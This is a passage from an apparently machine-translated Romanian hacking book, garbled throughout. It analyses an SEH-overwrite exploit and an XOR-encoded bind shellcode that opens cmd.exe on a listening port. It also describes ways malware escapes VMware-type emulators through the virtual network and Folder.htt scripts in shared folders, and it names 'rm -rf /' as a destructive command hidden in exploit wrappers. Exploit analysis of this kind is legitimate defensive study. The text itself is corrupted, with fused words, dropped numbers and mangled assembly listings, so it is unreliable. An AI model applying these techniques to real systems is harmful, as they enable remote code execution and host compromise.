sursă, dar principalele capabilități funcționale sunt închise în codul shell Analiza codului shell este osarcină foarte non-banală care necesită o mentalitate de inginerie, intuiție dezvoltată, cunoștințe extinse în domeniulprogramării în general și în special tehnicile speciale de dizassembing Este vorba despre aceste tehnici specialeDizAssemble și vor fi discutate în această secțiune Mesajele despre găuri apar constant Unul trebuie doar să te uiți lahttp://www securityfocus com și vei fi îngrozit!Fiecare zi aduce - de noi găuri care afectează aproape întregulspectru de hardware și software Mai folosești Firefox și consideri acest browser în siguranță?Da, indiferent cum!Întimpul scurt al existenței sale, a reușit să formeze nu mai puțin de o gaură de cincizeci, inclusiv cele critice Șiluați operă - mai mult de o sută de erori înregistrate pe SecurityFocus!Citirea acestor informații eliberează rapid diniluzii și alte coji de publicitate Vulnerabilitățile se găsesc chiar și în browserele de text precum Lynx Este mai binesă nu vă amintiți despre Internet Explorer!Merită după aceea să fii surprins de faptul că viermii se înmulțesc cu vitezaunui incendiu forestier și strică în mod regulat segmentele de rețea întregi, dacă nu chiar întregul internet!Software-ul nu este de încredere Este un fapt!A plecat la sine, fără plecarea și supravegherea administratorului, devine rapid ovictimă a atacurilor de hackeri, transformându -se într -o creșă de viruși și viermi Dacă vulnerabilitatea afecteazăacele componente ale sistemului, fără de care puteți, în principiu, (de exemplu, coada de mesaje sau RPC DCOM), acesteapot fi oprite sau îngrădite cu un firewall În caz contrar, este necesar să instalați un plasture de la producătorul„autohton” sau furnizorii din al treilea Problema este că actualizările oficiale sunt adesea disponibile la doar câtevaluni de la recunoașterea oficială a găurii Și câte găuri rămân „nerecunoscute”?Producătorii de software pot fi înțeleși:până la urmă, înainte de a recunoaște existența vulnerabilității, este necesar să vă asigurați că aceasta este într-adevăr o gaură în sistemul de securitate și nu o „viziune a autorului asupra funcționalității” și să obțină oreproducere durabilă a unui eșec Multe companii au o politică de tăcere a găurilor, iar vulnerabilitatea este eliminatăîn liniște odată cu lansarea următoarei versiuni a produsului (pachet de actualizare cumulativă), fie GPAVA nu estecorectat Detectarea, depanarea și dizassemblarea programelor rău intenționate în general!Un exempluizbitor este vulnerabilitatea „MS IE (MSHTML DLL) vulnerabilitatea etichetei obiectului”, descoperită pe aprilie (vezi http://lists grok org uk/pipermail/full-disclosure/ - April/ html/ html/șihttp://www cve mitre org/cgi-bin/cvename cgi?name=cve- - ) Pentru ca administratorul să poată dormi calm și să nuse răsucească la fiecare cinci minute, încercând să găsească „ceva neobișnuit” în jurnalele Brandmauer, primul lucrueste să afle dacă sistemul încredințat de el este vulnerabil? Nu toate rapoartele despre găuri se pot crede Conformpracticii general acceptate, descoperitor, descoperitorul găurile trebuie să-și confirme cuvintele cu un program care sădemonstreze prezența vulnerabilității, dar nu comite nimic distructiv În literatura străină sunt numite exploatări dedovadă a conceptului Din păcate, există, există, există Niciun termen rus stabilit, de aceea este necesar să seutilizeze ceea ce este Testat (testat) și platforme vulnerabile și tot ce trebuie făcut este să ruleze exploatarea pesistemul său și să vadă dacă va face față sau nu În mod natural, Pentru a ataca serverul „live” sau principala stațiede lucru se poate sinucide (sau o persoană incredibil de iresponsabilă) și toate experimentele potențial periculoase artrebui să fie efectuate pe „copii” aleFaith/Work Stație special concepută în scopuri de testare Este mai bine să nurulați VMware și alte emulatoare de acest tip de exploatare În primul rând, unele exploatări rău intenționate recunoscprezența virtuală mașini și refuză să lucreze În al doilea rând, este foarte posibil să ieșiți din temnițele mașinii virtuale, care va fidescrisă în capitolul următor Rezultatul negativ în sine nu dovedește nimic Chiar dacă atacul a eșuat, nu avem niciunmotiv să credem că sistemul este sigur Poate că aceasta este doar o exploatare scrisă slab, dar ar trebui să fie ușorcorectată, deoarece o listă de sisteme afectate va crește vizibil Acest lucru este cu atât mai corect că multeexploatări se bazează pe adrese fixe care variază de la versiune la versiune Prin urmare, de exemplu, o exploatareconcepută pentru versiunea engleză a Windows poate să nu funcționeze în rusă și, în consecință, invers Din păcate, nutoată lumea are o copie oglindă a serverului, iar crearea acestuia necesită bani, timp, etc Din aceste motive,exploatările sunt lansate pe mașini „vii” Dacă decideți un astfel de act disperat, atunci studiați cel puțin codul deexploatare pentru a ști ce începeți deloc Pe parcurs, nu interferează cu eliminarea erorilor făcute de dezvoltatorii deexploatare și adaptare codul shell, dacă este necesar, ajustarea adreselor fixe În mod formal, administratorul nutrebuie să fie programator și nimeni nu are dreptul să ceară cunoștințele de asamblare de la el, ci Forțele deviață!În calitate de exploatări, codul principal de exploatare este utilizat, de regulă, este scris într -un limbajtolerabil de nivel ridicat, de exemplu, în C/C ++, Perl, Python Exotic ca Ruby este mult mai puțin obișnuit, dar totușigăsit În termeni practice, acest lucru înseamnă că coada -Cordul trebuie să dețină o duzină de limbi populare cel puținla nivelul citirii fluente a listărilor Cu toate acestea, în nouă cazuri din zece, nu se găsește nimic interesant înele, iar întreaga încărcare de luptă este concentrată în tablourile de șiruri „magice” decorate în stilul \ x \ x \xe \ xc \ x \ xfc Acesta este codul shell în reprezentarea ASCII Codul cu nivel înalt este doar un „înveliș” Înmod figurat vorbind, codul la nivel înalt este un arc, iar codul shell este o săgeată Destul de mulți cercetători fac oeroare fatală: analizarea codului shell, ei uită că codul principal poate conține instrucțiuni rău intenționate precumRM -RF / Când cunoașteți limbajul, trucurile murdare de acest fel, acestea se găsesc fără dificultăți, cu excepțiacazului în care, desigur, atacatorul a căutat să împiedice analiza Există multe modalități de a deghiza codul răuintenționat în structuri inofensive Luați cel puțin o linie $?S: S;;$?:: s;; =] =>%- { în modul Dizas-Sinema, faceți clic pe și introduceți adresa e (punctul indică faptul căaceasta este adresa, nu deplasarea) GPAVA Detectarea, depanarea și DizAssembling of Programs Malicious Vețivedea codul afișat în lista E : F Pop EDI;Turnați un cuvânt dublu din stivă EA: E Pop ESI;Turnațiurmătorul dublu cuvânt , SZ Retn;Împingeți adresa de întoarcere și;Trece controlul asupra lui Desigur, aceastămetodă nu este universală și, în general, nu este de încredere, deoarece într -o altă versiune MQSVC exe, adresasecvenței „magice” va fi probabil diferită Este adevărat că este demn de remarcat faptul că în Windows , Windows Professional, Windows Server/Advanced Server Adrese va coincide, deoarece aceeași versiune a MQSVC exe estefolosită, dar în Windows este deja „navigând” Intuitiv, considerăm că transferul de control către codul shell esteefectuat prin RET, dar nu este clar cum indicatorul către Shell s -ar putea găsi în stivă, pentru că nimeni nu l -atrimis clar acolo!Vă puteți înghesui într -un tampon copleșitor orice doriți, dar va trebui să indicați adresa exactă aplasării codului shell în memorie, iar pentru aceasta trebuie să știți valoarea registrului ESP în momentul atacului,iar acest lucru Valoarea este în general necunoscută Excepțiile structurale vă permit să rezolvați elegant aceastăproblemă În loc să ștergem adresa de întoarcere, modul în care această închinare a codului a făcut diggerii, înlocuimcadrul SEH original al programului atacat cu ale noastre Teoretic, Flime-ul SEH poate fi amplasat oriunde, dar aproapetoate compilatoarele cunoscute le plasează în stivă (Fig ), în partea de sus a cadrului funcției, adică lângă re-instrucțiuni și instrucțiunile din RET (listarea ) ;Listarea Un fragment din funcția care formează noul șeh-flime (compilator-microsoft text: d pushh ebp; deschide nou este ultimul seh-fram text: pushofset stru ; prezicând seh chacher text: push offset excepthander; nou-designer: c mov eAx, marifs: ; primiți un indice: ; PUSH EAX; Cutterul SEH anterior Text: Mov mare fs: , esp; înregistraținoul Text: ; seh-frame Rezultă că dacă putem șterge fundalul cadrului SEH, fără probleme! Structura cadrelorîn sine este pur și simplu primitiv (listarea ) LISTING STRUCTURA^ZENCHFRAMES STRUCT EXCEPȚIE-Îngistire { /* h * / excepție rigistration / * h * / dword *prev; // anterior seh-frime *handler; / desprelucrări deexcepție Primul cuvânt dublu indică cadrul SEH anterior din lanț Dacă handler -ul actual nu știe ce să facă cu excepția,el îl dă manipulatorului anterior;Dacă niciunul dintre manipulatori nu poate prelucra excepția, atunci sistemul deoperare aruncă faimosul mesaj despre o eroare critică și completează aplicația aplicației în modul de urgență ParteaV Codicopagingul practic este următorul dublu cuvânt care conține adresa procedurii pentru procesorul de excepție (nutrebuie confundat cu funcția de excepție, care nu este servită de sistemul de operare, ci de compilator!) Este foartetentant să scriem aici un indicator pentru codul shell, dar întreaga problemă este că nu știm acest indicator și, încazul general, nu putem afla!De fapt, situația nu este atât de deplorabilă Luați în considerare mai îndeaproape procesulde procesare a excepțiilor În momentul în care codul aplicației încearcă să facă ceva inacceptabil, procesorul genereazăo întrerupere Sistemul de operare îl interceptează și transmite funcția internă a KiSeRexceptionDispatcher, conținută înntdll dll Ea, la rândul său, provoacă o funcție intermediară rtlunwind (toate de la același ntdll dll) care transferăcontrolul filtrului de excepție instalat de compilator (în cazul Microsoft Visual C ++ această funcție Se numește except handler ), care este și numește un manipulator aplicat înregistrat de un programator al unei aplicațiivulnerabile Cu alte cuvinte, se obține următorul lanț de apeluri (lista ) Ntdlll dll! Kisurexceptiondispatcher ->ntdall dllburgtlunwind -> cu excepția handler în Windows ntdlllllllllartlunwind lasă puțin „gunoi” în registre,ca urmare a faptului că adresa actuală SEH -cadru va fi adresată ESH Și acest lucru înseamnă că, pentru a atingeobiectivul conceput, trebuie să plasăm indicatorul pe JMP EVS (FFH E H) sau să apelăm la esh (FFH D H), care poate figăsit atât în ​​programul de atac, cât și în memoria sistemului de operare Apoi, dacă apare managementul, conducereava fi în mod natural, adresa va „înota” de la versiune la versiunea că există un rău inevitabil, dar acest lucru trebuiereconciliat GPAVA Detectarea, depanarea și dizassamblarea programelor rău intenționate este transmisă unuicuvânt dublu care conține un indicator al RGE Da, da!Nu în conformitate cu indicatorul RGE, ci la indicatorul în sine,care ar trebui înlocuit cu JMP Short Shell-Code Deoarece comenzile de tranziție din procesoarele x sunt relative, numai este necesar să cunoaștem locația exactă a codului shell în memorie În Windows XP, această lacună a fost acoperită,dar!A existat un filtru funcțional cu excepția handler , care face parte din compilatorul RTL și, prin urmare, nudepinde de sistemul de operare Luați în considerare împrejurimile codului DizAssemble care transferă conducerea cătreprocesorul înregistrat de programator (listarea ) ;Listarea L Fragment de funcție RTL ^ahseroapssheegz, păstrândindicatorul la curent: cadru SEH înainte de a se numi procesorul de excludere Text: dl mov eSI, [ebx+och];Poin lacadrul SEH actual Text: D MOV EDI, [EBX+ ] Text: D Text: D unknwn libname :;Cod xref:unknwn libname l+ ij Text: D CRNP ESI, OFFFFFFFFH;Nu mai există artizanat? Text: DA SCURTNENKNWN LIBNAME ;Dacă da, Text: DA;Încheiem programul Text: dc LEA ECX, [ESI+ESI* ] Text: DF EMPDWORD PTR [EDI+ECX* + ], Text: E Z scurt unknwn libname ;Microsoft VisualC - /Net Text: E PUSHESI;Păstrăm indicatorul la cadru Text: E PUSH EBP;Păstrăm indicatorul la cadru Text: E LEA EBP,[EBX+ H] • Text: eb Call DWORD PTR [EDI+ECX* + ];Call Text Processor: eb;Excepții Text: EF POPEBP;Restabiliți cadrul Text - F POP ESI;Restabiliți cadrul Înainte de a apela procesorul de excepție, funcțiapăstrează temporar indicatorul la cadrul SEH actual din stivă (echipa Push ESI), care la momentul apelurilorprocesorului vor fi localizate în funcție de deplasarea + H Mai mult, este imposibil să remediați acest lucru prinintermediul sistemului de operare!Este necesar să rescrieți RTL din fiecare compilator și să treceți toateprogramele!Pentru a implementa atacul, este suficient să înlocuiți handler -ul cu un indicator cu pop reg/pop reg/retsau adăugați esp, /ret (care se găsesc adesea în epilogele funcționale) și, ca înainte, scrieți pe va trebui Primaechipă a ROR se confruntă cu partea de sus a stivei deja o adresă de întoarcere inutilă lăsată de instrucțiunile deapel, a doua aruncare a Evterului de registru păstrat și gestionarea transferurilor RET în cadrul actual SEH Acum,structura tabloului de compensări devine din ce în ce mai puțin sau mai puțin de înțeles Vedem trei cadre SEH false-Onecu unul pentru fiecare sistem de operare localizat în memorie, astfel încât acestea să coincidă cu cadrele SEH actualeale programului atacat Aceasta este cea mai capricioasă parte a exploatării, deoarece implementarea cadrelor depinde deversiunea programului de atac (adăugarea sau eliminarea variabilelor locale în interiorul unei funcții vulnerabileschimbă distanța dintre cadru și un tampon copleșitor) și de poziția inițială a stivei la momentul lansării programului(sistemul de operare este responsabil pentru acest lucru) În plus, este necesar să vă asigurați că manipulatorul indicăîntr -adevăr pop reg/pop reg/ret (adăugați esp, /ret) și nu pe altceva În caz contrar, nu va funcționa exploat Dar,dacă toate valorile sunt selectate corect, controlul va primi tabloul Bind shellcode, pe care acum vom încerca să -ldizassmit Înainte de a continua cu DizAssempsing, este necesar să se transforme șirul ASCII într -un tip binar, astfelîncât să fie „înghițit” de Hiew sau IDA Pro Partea V , Cord -Cord -Capacitate, în loc să scriem un program pentruconvertirea de la zero, vom folosi capacitățile compilatorului de limbă C scriind un program simplu (listarea ),care constă de fapt dintr -o singură linie (restul - reclame) Listarea Program, Shellcodefl ascii-massage în același fișier binar adecvat pentru dizassemlaging tTinclude char hillingcode []= "\ xxx \ xxx \ xxx \ xxx";// ooda, interferăm cu tabloul pentru convertirea main () (fișier *f; if (f = fopeen("shellcode", "wb")) fwrite (shellcode, sizeof (shellcode), , f);} selectați Array -ul Bind ShellCode și copia înprogramul nostru, redenumindu -l în shellcode Ne compilim cu setările implicite și rulăm Fișierul Chellcode esteformat pe disc, gata de descărcare în IDA Pro sau Hiew (pur și simplu nu uitați să schimbați Dizassembler în Regimul de de cifre!) Listarea arată ca în lista '■ Listarea La începutul codului Sfieli este un decodificatorcare descifrează restul codului : c Sub Ecx, Ecx; Ecx: = : E V Sub Ecx, - ; EBX: EBX: EBX:EBX: EBX: EBX: EBX: EBX = H : D EE FLDZ; Download + de Stack FPU : D F FStenv [ESP] [ C];Mediul FPU în memorie V: V pop ebx; eush: = & fldz c: f Xor D, [EBX] [ ], f OOoooooos;Cu cuvinte duble : EBFC sub EBX, - ;EVCH += : Următorul dublu :;cuvânt : E F buclă oooooooos ( );Răsturnăm ciclul : E F în EAX, F;Echipa criptată A: EF OUT DX, EAX;Echipacriptată Primele echipe sunt mai mult sau mai puțin de înțeles, dar apoi începe gunoiul evident, cum ar fiinstrucțiunile din și OIT, care, atunci când încearcă să se execute în aplicație, exclud o excepție Ceva nu e bineaici!Fie punctul de intrare în codul shell nu începe cu primul octet (dar acest lucru contrazice rezultatele studiilornoastre), fie codul shell este criptat După ce am analizat primele opt echipe, găsim decodorul banal în fațainstrucțiunilor XOR cu satisfacție, prin urmare, punctul de intrare în codul shell este determinat corect și tot ceea ceeste necesar este să -l descifreze și pentru aceasta Trebuie să determinăm valorile registrelor EV și ESC și ESXutilizate de decodificator Nu este dificil să se ocupe de registrul UE - este clar inițializat prin transformărimatematice simple: subsh, eu -> eu: = ;Sub ebx, - h-> adaugă ECX, H-* ECX: = H, T E La intrarea în decodificator,ECH va avea o valoare de oh - doar atât de multe cuvinte duble pe care trebuie să le descifrăm Totul este mult maicomplicat cu Registrul EVS și, pentru a -și calcula valoarea, este necesar să se aprofundeze în structurile interne aledatelor de însoțire Echipa FLDZ plasează Stack-ul Contanta Constanta + , iar echipa FSTENV salvează însoțirea actualăla [ESP-OCH] Deschiderea conducerii „Intel Architecture Software Developer Manual Volumul Mediul în sine (formatulmediului în sine ( ) GPAVA Detectarea, depanarea și DizAssembling of Programs rău intenționat Listarea Pseudo-cod-ul comenzii fștenv, care păstrează mediul fpu fpucontrolword fpusword fputagword fpudatapointerfpuinstrunstriter fpulastrunstrenopcode -fstenv->-> -esp -> + , în caseta de dialog emergentă introducem codul de maisus, punându -l pe execuția + Traducem editorul într-un mod Hex, aducem cursorul în deplasarea H-TUDA, undese termină decodificatorul și începe codul criptat (vezi Lista ), treceți în editare Modul , faceți clic pe (XOR) și introduceți constanta de criptare, înregistrată ținând cont de ordinea inversă pe procesoarele X : HF H H H și continuați să apăsați metodic tasta până la cursorul ajunge la sfârșitul fișierului Păstrămschimbările în cheia și ieșim După decriptarea codului shell, puteți Dizassmit în modul normal Începem analiza, darapoi ne ocupăm într -o cascadă antidizacembler antică, dar încă lucrăm (listarea ) Partea V Cord -Cord -CordFig Decriptarea codului Shell în Hiew Segooo: OS :;Cod xref: segooo: oooooooolcjp segooo: a ev pushhffffffebh;Echipa ascunsă în Operand Segoo: V d Dec EBP;Continuarea echipei ascunse Segooo: C E F FF FF CallLOC +L;Apelarea la mijlocul Push Segooo: Pusha;Salvăm toate registrele de apel LOC + salturi undeva înmijlocul instrucțiunii de împingere, care trimite constanta FFFFFFFEBH, în care frânele cu experiență au văzut dejainstrucțiunile tranziției necondiționate stabilite de Opcod UE și întreaga echipă Se pare că: Ev dh "unde dh" se rupe"din instrucțiunile dec Este important să nu uităm că împingerea cu opcodul ah este o echipă de semne, adică nu existăFFH în opkod, așa că în loc de trecerea la adresa FFH (după cum urmează din textul Dizassessembler), obținem Trecerea laadresa EV DH (după cum urmează din codul mașinii), ceea ce nu este deloc același lucru!Tranziția în sine, apropo, esterelativă și este calculată de la sfârșitul echipei JMP, a cărei lungime în acest caz este egală cu două Pliați DH(tranziție țintită) cu LAH (adresa comenzii de tranziție în sine OS + = lah) și obțineți H Potrivit acesteideplasări, conducerea va fi transferată!Și comenzile care merg pentru instrucțiunile de apel sunt localizate doar pentrudeghizare, astfel încât inamicul să -și rupă capul mai mult Ei bine, mergem în districtul H și vedem ce avem bineacolo (listarea ) Lister Codul care calculează adresa de bază kernel dll prin urletul din Segooo: Segooo: V Segooo: F Segooo: Segooo: Segoo: db b b cEBX;EBX: = MOV EAX, FS: [EBX+ H];PEB MOV EAX, [EAX+OCH],- PEB LDR DATA MOV ESI, [EAX+LCH];Inlnitializareaordinuluimodulelist lodsd;Eax: = *esi mov eax, [eax+ ];Baza kernel dll cu prima echipă care reia EBX prin Xor, totuleste clar Dar cel de -al doilea citește ceva din celula care se află la FS: [Euger+ ] Selectorul FS indică zona dememorie în care sistemul de operare stochează serviciul (și practic nu documentat) date de flux GPAVA Detectarea,depanarea și DizAssembling of Programes Morminți Din fericire la dispoziția noastră este internetul Tastam Google„FS: [Zone]” (cu ghilimele!) Și obținem un număr imens de legături din publicitatea cartușelor TK-Zon până la materialecomplet sănătoase, din care aflăm că în celula FS: [ Zone] Există un indicator al procesului de blocare de încercuire(procesul de prelucrare a blocului, roar) Descrierea urletului în sine (ca multe alte structuri interne ale sistemuluide operare) poate fi obținută din minunată carte „Funcțiile fără documente Microsoft Windows NT/ ”, a cărei versiuneelectronică este disponibilă la: http: // undocumentdinternals Net/ Din ea vom afla că prin schimbarea OCH de laînceput, indexul este un indicator către structura PEB LDR DATA (prospectul ), conform deplasării ICH din care seaflă lista Nu indexul pentru Lista, și anume lista constând din două cuvinte duble: Pointer la următorul element allistei de listă și indicator la instanța structurii LDRJModule enumerate în ordinea inițializării modulelor După cumștiți, prima este inițializată de Kernel dll Kernel Amintiți -vă doar că arată adresele RVA relative, așa cătrebuie să le adăugați fie adresa de bază a descărcării kernel dll, fie să o scăpați de la adresa funcțieidorite Având la dispoziție funcția LoadLibrya, codul shell încarcă biblioteca WS pentru lucrul cu prize (listarea ) Numele ei este transmis direct prin stivă și se termină cu doi octeți zero (deși unul ar fi fostsuficient) Numele este format din echipa Push VN (după cum ne amintim, un pic mai devreme EVOS a fost transformat lazero - a se vedea lista ) Push VN este o echipă cu două ani, în timp ce Push Eush este unic Dar nu vom găsi vina culucrurile mărunte Listarea Descărcați biblioteca WS pentru a lucra cu prizele și inițializarea sa Segoo: Pushh BX;\ Segooo: Împingeți micul H;+ - "WS " Segooo: F PUSH F H;/ Segooo: d Push ESP;& "ws " segooo: e ff do sALLA EAX;LoadLibrya Segooo: CB ED FC B PUSH BFCEDCBH;Wsastartup Segooo: Push EAX Segoo: FF D Call ESI;ProceduraMyGetProcadress MyGetProCaddress preia din nou numărul „Magic” BFCEDCBH, care după decriptarea sub debugger estefuncțiile ari ale WSASTARTUP Provocarea acestei funcții nu este complet justificată, deoarece este suficient să o numimo dată pentru inițializarea bibliotecii socket o dată, că aplicația vulnerabilă a făcut -o de mult timp, altfel cum amreuși să o atacăm de la distanță?Secvența provocărilor ulterioare este destul de standard: wsasasketa ( , , o, o, o, )♦ legat (s, {sockaddr in ; sin port x eh), x ) - ♦ ascultă (s, ) - ♦ Acceptați (S , *addr, *addrlen) -> închidere(s) După ce a așteptat conectarea la un port dat, codul shell citește șirul ASCII, trecând-o la interpretul de comandăcmd exe în conformitate cu următoarea schemă: CreateProcessa (O, "CMD , O, , ipStartupinfo,ipprocessinformation) -„WaitForsingLPoBject (HPROC, - ) -„ EXITTHREAD ( ) Partea V Codicofagul practic alatacatorului poate rula orice programe și să execute comenzi de pachete, ceea ce îi oferă o putere aproape nelimitată,desigur, dacă cel din cazul Firewall-ul îi permite să facă acest lucru, cu toate acestea, problemele de ocolire afirewall-urilor sunt un subiect pentru o discuție separată Cum să lansezi codul shell sub un debugger metode decercetare statică, care includ Dizassempsing, nu sunt întotdeauna convenabile și, în multe cazuri, depanarea este Multmai preferat Cu toate acestea, debuggerii capabili să depanseze codul shell, nu există și trebuie să victimă Scriem unprogram simplu precum „Hello, World!” Și îl compilăm Deschidem fișierul executabil rezultat în H W, The the the the thethe the the the the H W, the the the the the Apăsare obișnuită Trecem la modul Hex, apăsăm tasta (antet) șimergem la punctul de intrare pentru Faceți clic pe și selectați un anumit număr de octeți cu un cursor,dimensiunea a cel puțin dimensiunea codului shell Faceți clic din nou pentru a completa descărcarea și a muta cursorulla începutul blocului selectat Acum facem clic pe combinația de tastatură + , în caseta de dialog care apare,introducem numele fișierului (în acest caz, shellcode) și după procesul de încărcare a blocului de pe disc, părăsimH EW Tasta nu poate fi apăsată, deoarece modificările sunt salvate automat Sfârșitul fișierului de intrare înseamnă că dimensiunea descărcării depășește dimensiunea fișierului În acest caz, aceasta este o situațienormală Situația opusă este mult mai gravă, deoarece dacă o parte a fișierului este descărcată, ea nu va funcționa înmod natural După această operație chirurgicală simplă, fișierul executabil poate fi depanat cu orice debugger, cel puținsoftice, cel puțin ollydbg (Fig ), dar înainte de a fi necesară editarea atributelor secțiunii de cod (de obiceise numește text ), permițând modificarea acestuia, altfel codul shell va fi exclus atunci când prima încercare deînregistrare Cel mai simplu mod de a prelucra fișierul folosind utilitatea Editbin, care face parte din kitul deaprovizionare standard pentru compilatorul Microsoft Visual C ++, pornind -o, așa cum se arată în lista = Listarea Înlăturarea secțiunii de cod a interdicției de înregistrare ', J editbin Filr ame cxe /Section: text, rwefig Shell-Code, depanat în debuggerul Ollydbg, așa că am făcut cunoștință cu tehnicile de bază pentru studiereaexploatărilor Principalul lucru este să nu vă pierdeți și să vă amintiți întotdeauna că există internetul ladispoziție!Este suficient să faceți o solicitare corectă și toate structurile fără documente vor fi vizibile ca înpalme, deoarece GPAVA Detectarea, depanarea și dizasarea programelor rău intenționate de sistemeoperaționale sunt deja legate de -a lungul și de -a lungul Este extrem de puțin probabil să întâlnești ceva fundamentalnou în codul shell Adică, a întâlni ceva este foarte probabil, dar această descoperire va rămâne cu puterea uneisăptămâni timp de o săptămână Și după aceea, ea va începe să se strecoare pe forumuri, reviste electronice și dehârtie Și atunci Microsoft va lansa următoarea corecție către sistemul său minunat, iar astfel de trucuri obținute vordeveni irelevante Link-uri interesante □ Apelurile de sistem Windows NT sunt cea mai completă colecție de apeluri desistem ale întregii linii de sisteme asemănătoare Windows NT Extrem de util pentru cercetători:http://www metasploit com/users/opcode/syscalls html D) Sistemul Linux Encyclopedia de apeluri sistemice ale diferitelorsisteme asemănătoare Linux cu prototipuri și, în unele locuri cu comentarii (în engleză): http://www lxhp in-berlin de/lhpsyscal html Capitolul Atacuri asupra emulatorilor Mulți hackeri și programatori lansează programedubioase pentru VMware și alte emulatoare, crezând că sunt protejați în mod fiabil Dar este atât de sigur să faciasta?Un cod rău intenționat poate ieși din emulator și poate cuceri sistemul principal?În acest capitol, examinămaceastă problemă în detaliu și, de asemenea, luăm în considerare mai multe scenarii de atacuri posibile În momentul MS-DOS și Windows L, pentru experimente cu viruși, a trebuit să păstrez mai multe computere pe masă sau să trec la un harddisk special, care era extrem de obositor Persoanele cu un dor de dor către Windows NT, al cărui sistem de securitate apermis lucruri care sunt imposibile în MS-DOS și Windows X, de exemplu, au permis procesului să schimbe doar fișierespecial plantate Vai!Majoritatea virușilor nu au funcționat sub Windows NT!În plus, apărarea s -a dovedit a fi extrem denesigură, iar hackerii au învățat să o ocolească, de exemplu, emulând să intre de la un mouse/tastatură și să trimită ocomandă către o fereastră mai privilegiată Odată cu apariția mașinilor virtuale (VMware, Virtual RS), ispita părea să lefolosească ca „corral” pentru viruși și viermi, ceea ce este foarte convenabil În loc de agitația cu monitoare, coca,discuri rigide și fire, o duzină de „unități de sistem” sunt plasate în mod liber într -un computer, în plus, uneleemulatoare (de exemplu, Bochs) conțin debitori construiți în care Softice și Olllydbg nu mai pot nu mai potface Întreaga întrebare este cât de fiabilă este să conduci un vierme vii pe un emulator Ce se întâmplă dacă sedesprinde din granițele sale?O analiză a viermilor prinși în sălbăticie arată că mulți dintre ei recunosc cu încredereprezența unui emulator, refuzând să o pornească În urma acestui fapt, viermele are șanse bune de a rămâne neobservat Darhackerul crede că nu merită în vigoare, încercând să izbucnească din temnițele unei mașini virtuale Teoretic, acestlucru este foarte posibil Emulele (în special dinamice, adică cele care o parte din comenzi sunt efectuate pe unprocesor „viu”) nu sunt lipsite de erori Comenzile privilegiate (cum ar fi un apel la porturile de intrare/ieșire) suntsurprinse de emulatori destul de fiabil și, de obicei, nu există niciun rake aici Cu toate acestea, există o amenințarereală de înregistrare în spațiul de adrese al procesului de emulator atunci când efectuați instrucțiuni„obișnuite” Desigur, modificările nu sunt supuse codului, ci datelor, dar dacă cel puțin un indice este printre acestedate (și va fi sigur), problema noastră de hacker poate fi considerată rezolvată Singura problemă este că o astfel degaură (chiar dacă este descoperită cu adevărat) va fi acoperită mai repede înainte de a câștiga răspândit În plus,varietatea emulatoarelor existente reduce semnificativ șansele Vierme pentru succes Renunțăm la găurile ipotetice și ne concentrăm pe tehnici universale care funcționează sub aproapeorice emulator și operează vulnerabilitățile nivelului conceptual, care nu sunt atât de ușor de închis Iată treiscenarii de atac destul de simple: d) penetrarea prin rețeaua virtuală d) interfața din spate a emulatorului d)implementarea în folder htt va lua în considerare aceste mecanisme mai detaliat GPAVA Atacul asupra emulatorilor atac prin rețeaua virtuală aproape toate emulatoarele susțin rețeaua virtuală care conectează sistemul invitat (invitat)și principalul (gazdă), așa cum a fost, un „cablu invizibil” În emulatoare precum QEMU, o rețea virtuală apare imediat,iar în WMware - numai după setarea corespunzătoare a mașinii virtuale (Fig ) Cu toate acestea, de obicei,emulatorul este configurat cu rețeaua, deoarece acesta este cel mai convenabil mod de a schimba date În plus, pe bazaaceluiași VMware poate fi ridicat cu ușurință de HoneyPot , un fel de „capcană” pentru viruși și viermi care se târăscde pe internet Orez Configurarea unei rețele virtuale în mediul emulator VMware, dacă principalul sistem de operareeste disponibil prin rețea și are găuri ilegale (cum ar fi găurile în DCOM RPC sau TCPIP SYS), poate fi atac liber desub emulator în același mod ca pe o rețea reală Singura diferență este că majoritatea firewall -urilor personale numonitorizează conexiunile locale și nu o împiedică Cu alte cuvinte, emulatorul permite hackerului să se conecteze laacele resurse, acces la care este închis în mod fiabil din exteriorul computerului!Când organizați miere, acest lucrueste foarte relevant!Să presupunem că sistemul principal conține resurse partajate disponibile numai din interiorulrețelei locale, iar pentru comoditate nu au parole Apoi, mașina virtuală devine un fel de „punte” (sau, dacă vă placeserverul RGHU) între hacker/vierme și sistemul principal!Cum să te protejezi de acest atac?Cel mai simplu este săștergeți o rețea virtuală, iar întregul schimb de date cu sistemul de invitați conduce prin dischetă sau CD-ROM Pentru anu vă deranja cu arderea CD-urilor, puteți utiliza imagini ISO virtuale, dar aceasta nu este încă o cale de ieșire!Acestlucru înseamnă că va fi necesar să instalați patch -uri proaspete pe sistemul principal în timp util, să instalațiHoneypot (engleză) - un „oală de miere” Acest termen „copiilor” este înțeles ca o resursă, a cărei sarcină este de aatrage potențialele biscuiti, de a -și asuma un atac și de a -și înregistra începutul Mai multe informații despreaceastă nouă tehnologie promițătoare pot fi obținute, de exemplu, din articolul următor:http://wwww securitylab ru/analytics/ php Partea V Cordul practic -Cord de parole pentru toate resurseleseparate și eliminați toate serviciile din mașina principală, accesul la care este nedorit Ca opțiune - asigurați -vă căfirewall -ul personal monitorizează conexiunile locale și le blochează Atacul prin Folder htt Emulator VMware oferă omodalitate de a schimba date între mașina virtuală și sistemul principal de operare - foldere partajate (folderegenerale) Atunci când configurați mașina de oaspeți, administratorul deschide accesul la unul sau mai multe cataloageale sistemului principal, iar mașina virtuală le „vede” în mediul său de rețea (Fig ) Setări de mașini ntualeOpțiuni hardware] Setări Surnrnrnrnrnrnrn Foldere și General Windows Nume profesional J HostFolder ■ Status JPower MainFrame Catemp activat Al doilea D: \ temp activat Snapshot Insula de oaspeți Activat și Drop activat ■ GL,avansat Norrnal/Nornal I-> sable partajat pliabil Adăugare |Perne-, ”cu |Proprietate;|OK |Anulare |AjutăFig Configurarea folderelor comune în mediul VM Ware a folderelor comune care ocolește rețeaua virtuală (care poatenu este) și este foarte fiabilă în ceea ce privește protecția, dar este încă posibil să o atacați!După cum știți,începând cu Windows , „conductorul” acceptă stilul de utilizator al folderelor controlate de Folder htt Acesta este unpas HTTP obișnuit, „Digesting” nu numai etichete, ci și scripturi Există multe viruși VBS care se propagă în acest fel(Fig ) Ce se va întâmpla dacă codul rău intenționat executat sub emulator va crea propriul dosar htt fișier sau vafi introdus în cel existent?La prima deschidere a folderului general de către conductorul sistemului principal, scriptulconținut în folder htt va primi control, punând viruși în bunurile lor!Și aceasta nu este singura cale!Virusul poatecrea un fișier desktop ini, ceea ce indică faptul că folderul este utilizat pentru a stoca imagini, apoi atunci cândeste deschis, conductorul afișează automat miniaturi Sunt cunoscute cel 